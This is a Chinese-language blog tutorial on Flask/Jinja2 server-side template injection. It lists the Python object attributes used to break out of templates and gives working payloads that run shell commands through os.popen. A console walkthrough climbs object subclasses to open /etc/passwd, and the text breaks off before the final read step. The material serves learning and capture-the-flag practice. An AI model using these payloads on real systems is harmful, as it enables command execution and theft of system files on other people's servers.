<!doctype html>
<html lang="en"><head>
<title>SSTI Flask模板 - Wray的Blog</title>
<meta charset="UTF-8">
<meta name="keywords" content="">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5">

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<meta name="description" content="SSTI Flask模板基础控制结构 &amp;#123;% %&amp;#125; 变量取值 &amp;#123;&amp;#123; &amp;#125;&amp;#125; 注释 &amp;#123;# #&amp;#125;  __class__            类的一个内置属性，表示实例对象的类。 __base__             类型对象的直接基类 __bases__            类型对象的全部基类，以元组形式，类型的实例通">
<meta property="og:type" content="article">
<meta property="og:title" content="SSTI Flask模板">
<meta property="og:url" content="http://blog.wray7.top/2023/09/04/Network/Safety/SSTI%20Flask%E6%A8%A1%E6%9D%BF/index.html">
<meta property="og:site_name" content="Wray的Blog">
<meta property="og:description" content="SSTI Flask模板基础控制结构 &amp;#123;% %&amp;#125; 变量取值 &amp;#123;&amp;#123; &amp;#125;&amp;#125; 注释 &amp;#123;# #&amp;#125;  __class__            类的一个内置属性，表示实例对象的类。 __base__             类型对象的直接基类 __bases__            类型对象的全部基类，以元组形式，类型的实例通">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2023-09-04T13:48:57.000Z">
<meta property="article:modified_time" content="2024-04-09T15:50:40.741Z">
<meta property="article:author" content="Wray Lee">
<meta name="twitter:card" content="summary">

<link rel="stylesheet" href="/lib/fancybox/fancybox.css">
<link rel="stylesheet" href="/lib/mdui_043tiny/mdui.css">


<link rel="stylesheet" href="/lib/iconfont/iconfont.css?v=1712679368727">

<link rel="stylesheet" href="/css/style.css?v=1712679368727">




    
        <link rel="stylesheet" href="/custom.css?v=1712679368727">
    



<script src="/lib/mdui_043tiny/mdui.js" async></script>
<script src="/lib/fancybox/fancybox.umd.js" async></script>
<script src="/lib/lax.min.js" async></script>


<script async src="/js/app.js?v=1712679368727"></script>

 

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-4D4ZJ9G024"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag("js", new Date());

  gtag("config", "G-4D4ZJ9G024");
</script>


<link rel="stylesheet"  href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.8.0/styles/atom-one-dark.min.css">
<meta name="generator" content="Hexo 6.3.0"></head><body class="nexmoe mdui-drawer-body-left"><div id="nexmoe-background"><div class="nexmoe-bg" style="background-image: url(https://th.bing.com/th/id/R.917ca069a2af6fd72956834eb08358c5?rik=BqcoPnxAZUEIMQ&pid=ImgRaw&r=0)"></div><div class="mdui-appbar mdui-shadow-0"><div class="mdui-toolbar"><a class="mdui-btn mdui-btn-icon mdui-ripple" mdui-drawer="{target: &#039;#drawer&#039;, swipe: true}" title="menu"><i class="mdui-icon nexmoefont icon-menu"></i></a><div class="mdui-toolbar-spacer"></div><a class="mdui-btn mdui-btn-icon" href="/" title="Wray Lee"><img src="https://cn.gravatar.com/userimage/233116289/1526482abfaf22d825aea126c7edcd17.jpeg?size=256" alt="Wray Lee"></a></div></div></div><div id="nexmoe-header"><div class="nexmoe-drawer mdui-drawer" id="drawer">
    <div class="nexmoe-avatar mdui-ripple">
        <a href="/" title="Wray Lee">
            <img src="https://cn.gravatar.com/userimage/233116289/1526482abfaf22d825aea126c7edcd17.jpeg?size=256" alt="Wray Lee" alt="Wray Lee">
        </a>
    </div>
    <div class="nexmoe-count">
        <div><span>Articles</span>35</div>
        <div><span>Tags</span>0</div>
        <div><span>Categories</span>0</div>
    </div>
    <div class="nexmoe-list mdui-list" mdui-collapse="{accordion: true}">
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/" title="回到首页">
            <i class="mdui-list-item-icon nexmoefont icon-home"></i>
            <div class="mdui-list-item-content">
                回到首页
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/archive.html" title="文章归档">
            <i class="mdui-list-item-icon nexmoefont icon-container"></i>
            <div class="mdui-list-item-content">
                文章归档
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/PY.html" title="我的朋友">
            <i class="mdui-list-item-icon nexmoefont icon-unorderedlist"></i>
            <div class="mdui-list-item-content">
                我的朋友
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/donate.html" title="给我赞助">
            <i class="mdui-list-item-icon nexmoefont icon-coffee"></i>
            <div class="mdui-list-item-content">
                给我赞助
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/about.html" title="关于博主">
            <i class="mdui-list-item-icon nexmoefont icon-info-circle"></i>
            <div class="mdui-list-item-content">
                关于博主
            </div>
        </a>
        
    </div>
    
    
        
        <div class="nexmoe-widget-wrap">
    <div class="nexmoe-widget nexmoe-search">
        
            <form id="search_form">
                <label><input class="st-default-search-input" id="search_value" name="q" type="search" placeholder="Search" style="
                    font-size: 15px !important;
                    height: 56px !important;
                    background-image: none;
                "></label>
            </form>
         
    </div>
</div>


	<script async src="/js/search.js?v=1712679368727"></script>



    
        
        <div class="nexmoe-widget-wrap">
	<div class="nexmoe-widget nexmoe-social">
		<a
			class="mdui-ripple"
			href="https://t.me/+7RWkqugoPudjMjA1"
			target="_blank"
			mdui-tooltip="{content: 'Telegram群'}"
			style="
				color: rgb(249, 174, 8);
				background-color: rgba(249, 174, 8, .1);
			"
		>
			<i
				class="nexmoefont icon-telegram"
			></i> </a
		><a
			class="mdui-ripple"
			href="https://space.bilibili.com/13441368"
			target="_blank"
			mdui-tooltip="{content: '哔哩哔哩'}"
			style="
				color: rgb(231, 106, 141);
				background-color: rgba(231, 106, 141, .1);
			"
		>
			<i
				class="nexmoefont icon-bilibili"
			></i> </a
		><a
			class="mdui-ripple"
			href="https://github.com/wray-lee/"
			target="_blank"
			mdui-tooltip="{content: 'GitHub'}"
			style="
				color: rgb(25, 23, 23);
				background-color: rgba(25, 23, 23, .1);
			"
		>
			<i
				class="nexmoefont icon-github"
			></i> </a
		><a
			class="mdui-ripple"
			href="https://twitter.com/wraysidlee"
			target="_blank"
			mdui-tooltip="{content: 'Twitter'}"
			style="
				color: rgb(59, 151, 239);
				background-color: rgba(59, 151, 239, .1);
			"
		>
			<i
				class="nexmoefont icon-twitter"
			></i> </a
		>
	</div>
</div>

    
        
        

    
        
        
    
        
        
        
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">Archive</h3>
    <div class="nexmoe-widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/">2024</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/">2023</a><span class="archive-list-count">33</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/">2019</a><span class="archive-list-count">1</span></li></ul>
    </div>
  </div>



    
        
        
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">Recent Posts</h3>
    <div class="nexmoe-widget">
      <ul>
        
          <li>
            <a href="/2024/04/09/Code/web-basic/">web-basic</a>
          </li>
        
          <li>
            <a href="/2023/09/05/Network/Server/devops/Crontab/">Crontab</a>
          </li>
        
          <li>
            <a href="/2023/09/05/Network/Server/devops/Docker/">Docker</a>
          </li>
        
          <li>
            <a href="/2023/09/04/Code/Git%E6%95%99%E7%A8%8B/">Git教程</a>
          </li>
        
          <li>
            <a href="/2023/09/04/Code/Shell%E8%AF%AD%E6%B3%95/">Shell语法</a>
          </li>
        
      </ul>
    </div>
  </div>

    
        
   
    <div class="nexmoe-copyright">
        &copy; 2024 Wray Lee
        Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
        & <a href="https://github.com/theme-nexmoe/hexo-theme-nexmoe" target="_blank">Nexmoe</a>
        
    </div>
</div><!-- .nexmoe-drawer --></div><div id="nexmoe-content"><div class="nexmoe-primary"><div class="nexmoe-post">
  <article>
    
        <div class="nexmoe-post-cover"> 
            <img src="https://th.bing.com/th/id/R.917ca069a2af6fd72956834eb08358c5?rik=BqcoPnxAZUEIMQ&pid=ImgRaw&r=0" alt="SSTI Flask模板" loading="lazy">
            <h1>SSTI Flask模板</h1>
        </div>
    
    
    <div class="nexmoe-post-meta">
    <div class="nexmoe-rainbow">
        <a class="nexmoefont icon-calendar-fill">2023年09月04日</a>
        
        
    </div>
    
    
    
    
    
</div>

    <h1 id="SSTI-Flask模板"><a href="#SSTI-Flask模板" class="headerlink" title="SSTI Flask模板"></a>SSTI Flask模板</h1><h1 id="基础"><a href="#基础" class="headerlink" title="基础"></a>基础</h1><pre class="line-numbers language-sql" data-language="sql"><code class="language-sql">控制结构 &#123;<span class="token operator">%</span> <span class="token operator">%</span>&#125;
变量取值 &#123;&#123; &#125;&#125;
注释 &#123;<span class="token comment"># #&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql">__class__            类的一个内置属性，表示实例对象的类。
__base__             类型对象的直接基类
__bases__            类型对象的全部基类，以元组形式，类型的实例通常没有属性 __bases__
__mro__              此属性是由类组成的元组，在方法解析期间会基于它来查找基类。
__subclasses__<span class="token punctuation">(</span><span class="token punctuation">)</span>     返回这个类的子类集合，Each class keeps a list <span class="token keyword">of</span> weak <span class="token keyword">references</span> <span class="token keyword">to</span> its immediate subclasses<span class="token punctuation">.</span> This method <span class="token keyword">returns</span> a list <span class="token keyword">of</span> <span class="token keyword">all</span> those <span class="token keyword">references</span> still alive<span class="token punctuation">.</span> The list <span class="token operator">is</span> <span class="token operator">in</span> definition <span class="token keyword">order</span><span class="token punctuation">.</span>
__init__             初始化类，返回的类型是<span class="token keyword">function</span>
__globals__          使用方式是 函数名<span class="token punctuation">.</span>__globals__获取<span class="token keyword">function</span>所处空间下可使用的module、方法以及所有变量。
__dic__              类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里
__getattribute__<span class="token punctuation">(</span><span class="token punctuation">)</span>   实例、类、函数都具有的__getattribute__魔术方法。事实上，在实例化的对象进行<span class="token punctuation">.</span>操作的时候（形如：a<span class="token punctuation">.</span>xxx<span class="token operator">/</span>a<span class="token punctuation">.</span>xxx<span class="token punctuation">(</span><span class="token punctuation">)</span>），都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。
__getitem__<span class="token punctuation">(</span><span class="token punctuation">)</span>        调用字典中的键值，其实就是调用这个魔术方法，比如a<span class="token punctuation">[</span><span class="token string">'b'</span><span class="token punctuation">]</span>，就是a<span class="token punctuation">.</span>__getitem__<span class="token punctuation">(</span><span class="token string">'b'</span><span class="token punctuation">)</span>
__builtins__         内建名称空间，内建名称空间有许多名字到对象之间映射，而这些名字其实就是内建函数的名称，对象就是这些内建函数本身。即里面有很多常用的函数。__builtins__与__builtin__的区别就不放了，百度都有。
__import__           动态加载类和函数，也就是导入模块，经常用于导入os模块，__import__<span class="token punctuation">(</span><span class="token string">'os'</span><span class="token punctuation">)</span><span class="token punctuation">.</span>popen<span class="token punctuation">(</span><span class="token string">'ls'</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token keyword">read</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">]</span>
__str__<span class="token punctuation">(</span><span class="token punctuation">)</span>            返回描写这个对象的字符串，可以理解成就是打印出来。
url_for              flask的一个方法，可以用于得到__builtins__，而且url_for<span class="token punctuation">.</span>__globals__<span class="token punctuation">[</span><span class="token string">'__builtins__'</span><span class="token punctuation">]</span>含有current_app。
get_flashed_messages flask的一个方法，可以用于得到__builtins__，而且url_for<span class="token punctuation">.</span>__globals__<span class="token punctuation">[</span><span class="token string">'__builtins__'</span><span class="token punctuation">]</span>含有current_app。
lipsum               flask的一个方法，可以用于得到__builtins__，而且lipsum<span class="token punctuation">.</span>__globals__含有os模块：&#123;&#123;lipsum<span class="token punctuation">.</span>__globals__<span class="token punctuation">[</span><span class="token string">'os'</span><span class="token punctuation">]</span><span class="token punctuation">.</span>popen<span class="token punctuation">(</span><span class="token string">'ls'</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token keyword">read</span><span class="token punctuation">(</span><span class="token punctuation">)</span>&#125;&#125;
current_app          应用上下文，一个全局变量。

request              可以用于获取字符串来绕过，包括下面这些，引用一下羽师傅的。此外，同样可以获取<span class="token keyword">open</span>函数:request<span class="token punctuation">.</span>__init__<span class="token punctuation">.</span>__globals__<span class="token punctuation">[</span><span class="token string">'__builtins__'</span><span class="token punctuation">]</span><span class="token punctuation">.</span><span class="token keyword">open</span><span class="token punctuation">(</span><span class="token string">'/proc\self\fd/3'</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token keyword">read</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
request<span class="token punctuation">.</span>args<span class="token punctuation">.</span>x1   	 get传参
request<span class="token punctuation">.</span><span class="token keyword">values</span><span class="token punctuation">.</span>x1 	 所有参数
request<span class="token punctuation">.</span>cookies      cookies参数
request<span class="token punctuation">.</span>headers      请求头参数
request<span class="token punctuation">.</span>form<span class="token punctuation">.</span>x1   	 post传参	<span class="token punctuation">(</span>Content<span class="token operator">-</span><span class="token keyword">Type</span>:applicaation<span class="token operator">/</span>x<span class="token operator">-</span>www<span class="token operator">-</span>form<span class="token operator">-</span>urlencoded或multipart<span class="token operator">/</span>form<span class="token operator">-</span><span class="token keyword">data</span><span class="token punctuation">)</span>
request<span class="token punctuation">.</span><span class="token keyword">data</span>  		 post传参	<span class="token punctuation">(</span>Content<span class="token operator">-</span><span class="token keyword">Type</span>:a<span class="token operator">/</span>b<span class="token punctuation">)</span>
request<span class="token punctuation">.</span>json		 post传json  <span class="token punctuation">(</span>Content<span class="token operator">-</span><span class="token keyword">Type</span>: application<span class="token operator">/</span>json<span class="token punctuation">)</span>
config               当前application的所有配置。此外，也可以这样&#123;&#123; config<span class="token punctuation">.</span>__class__<span class="token punctuation">.</span>__init__<span class="token punctuation">.</span>__globals__<span class="token punctuation">[</span><span class="token string">'os'</span><span class="token punctuation">]</span><span class="token punctuation">.</span>popen<span class="token punctuation">(</span><span class="token string">'ls'</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token keyword">read</span><span class="token punctuation">(</span><span class="token punctuation">)</span> &#125;&#125;
g                    &#123;&#123;g&#125;&#125;得到<span class="token operator">&lt;</span>flask<span class="token punctuation">.</span>g <span class="token keyword">of</span> <span class="token string">'flask_ssti'</span><span class="token operator">></span>





<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql">





<span class="token comment"># 获得一个字符串实例</span>
<span class="token operator">>></span><span class="token operator">></span> <span class="token string">""</span>
<span class="token string">''</span>
<span class="token comment"># 获得字符串的type实例</span>
<span class="token operator">>></span><span class="token operator">></span> <span class="token string">""</span><span class="token punctuation">.</span>__class__ 
<span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'str'</span><span class="token operator">></span>

<span class="token comment"># 获得其父类</span>
<span class="token operator">>></span> <span class="token string">""</span><span class="token punctuation">.</span>__class__<span class="token punctuation">.</span>__mro__
<span class="token punctuation">(</span><span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'str'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'basestring'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'object'</span><span class="token operator">></span><span class="token punctuation">)</span>

<span class="token comment"># 获得父类中的object类</span>
<span class="token operator">>></span><span class="token operator">></span> <span class="token string">""</span><span class="token punctuation">.</span>__class__<span class="token punctuation">.</span>__mro__<span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span> 
<span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'object'</span><span class="token operator">></span>

<span class="token comment"># 获得object类的子类，但发现这个__subclasses__属性是个方法</span>
<span class="token operator">>></span><span class="token operator">></span> <span class="token string">""</span><span class="token punctuation">.</span>__class__<span class="token punctuation">.</span>__mro__<span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token punctuation">.</span>__subclasses__
<span class="token operator">&lt;</span>built<span class="token operator">-</span><span class="token operator">in</span> method __subclasses__ <span class="token keyword">of</span> <span class="token keyword">type</span> object at <span class="token number">0x10376d320</span><span class="token operator">></span>

<span class="token comment"># 使用__subclasses__()方法，获得object类的子类</span>
<span class="token operator">>></span><span class="token operator">></span> <span class="token string">""</span><span class="token punctuation">.</span>__class__<span class="token punctuation">.</span>__mro__<span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token punctuation">.</span>__subclasses__<span class="token punctuation">(</span><span class="token punctuation">)</span> 
<span class="token punctuation">[</span><span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'type'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'weakref'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'weakcallableproxy'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'weakproxy'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'int'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'basestring'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'bytearray'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'list'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'NoneType'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'NotImplementedType'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'traceback'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'super'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'xrange'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'dict'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'set'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'slice'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'staticmethod'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'complex'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'float'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'buffer'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'long'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'frozenset'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'property'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'memoryview'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'tuple'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'enumerate'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'reversed'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'code'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'frame'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'builtin_function_or_method'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'instancemethod'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'function'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'classobj'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'dictproxy'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'generator'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'getset_descriptor'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'wrapper_descriptor'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'instance'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'ellipsis'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'member_descriptor'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'file'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'PyCapsule'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'cell'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'callable-iterator'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'iterator'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'sys.long_info'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'sys.float_info'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'EncodingMap'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'fieldnameiterator'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'formatteriterator'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'sys.version_info'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'sys.flags'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'exceptions.BaseException'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'module'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'imp.NullImporter'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'zipimport.zipimporter'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'posix.stat_result'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'posix.statvfs_result'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span>class <span class="token string">'warnings.WarningMessage'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span>class <span class="token string">'warnings.catch_warnings'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span>class <span class="token string">'_weakrefset._IterationGuard'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span>class <span class="token string">'_weakrefset.WeakSet'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span>class <span class="token string">'_abcoll.Hashable'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'classmethod'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span>class <span class="token string">'_abcoll.Iterable'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span>class <span class="token string">'_abcoll.Sized'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span>class <span class="token string">'_abcoll.Container'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span>class <span class="token string">'_abcoll.Callable'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'dict_keys'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'dict_items'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'dict_values'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span>class <span class="token string">'site._Printer'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span>class <span class="token string">'site._Helper'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'_sre.SRE_Pattern'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'_sre.SRE_Match'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'_sre.SRE_Scanner'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span>class <span class="token string">'site.Quitter'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span>class <span class="token string">'codecs.IncrementalEncoder'</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&lt;</span>class <span class="token string">'codecs.IncrementalDecoder'</span><span class="token operator">></span><span class="token punctuation">]</span>

<span class="token comment"># 获得第40个子类的一个实例，即一个file实例</span>
<span class="token operator">>></span><span class="token operator">></span> <span class="token string">""</span><span class="token punctuation">.</span>__class__<span class="token punctuation">.</span>__mro__<span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token punctuation">.</span>__subclasses__<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">40</span><span class="token punctuation">]</span> 
<span class="token operator">&lt;</span><span class="token keyword">type</span> <span class="token string">'file'</span><span class="token operator">></span>

<span class="token comment"># 对file初始化</span>
<span class="token operator">>></span><span class="token operator">></span> <span class="token string">""</span><span class="token punctuation">.</span>__class__<span class="token punctuation">.</span>__mro__<span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token punctuation">.</span>__subclasses__<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">40</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"/etc/passwd"</span><span class="token punctuation">)</span> 
<span class="token operator">&lt;</span><span class="token keyword">open</span> <span class="token keyword">file</span> <span class="token string">'/etc/passwd'</span><span class="token punctuation">,</span> <span class="token keyword">mode</span> <span class="token string">'r'</span> at <span class="token number">0x10397a8a0</span><span class="token operator">></span>

<span class="token comment"># 使用file的read属性读取，但发现是个方法</span>
<span class="token operator">>></span><span class="token operator">></span> <span class="token string">""</span><span class="token punctuation">.</span>__class__<span class="token punctuation">.</span>__mro__<span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token punctuation">.</span>__subclasses__<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">40</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"/etc/passwd"</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token keyword">read</span>
<span class="token operator">&lt;</span>built<span class="token operator">-</span><span class="token operator">in</span> method <span class="token keyword">read</span> <span class="token keyword">of</span> <span class="token keyword">file</span> object at <span class="token number">0x10397a5d0</span><span class="token operator">></span>

<span class="token comment"># 使用read()方法读取</span>
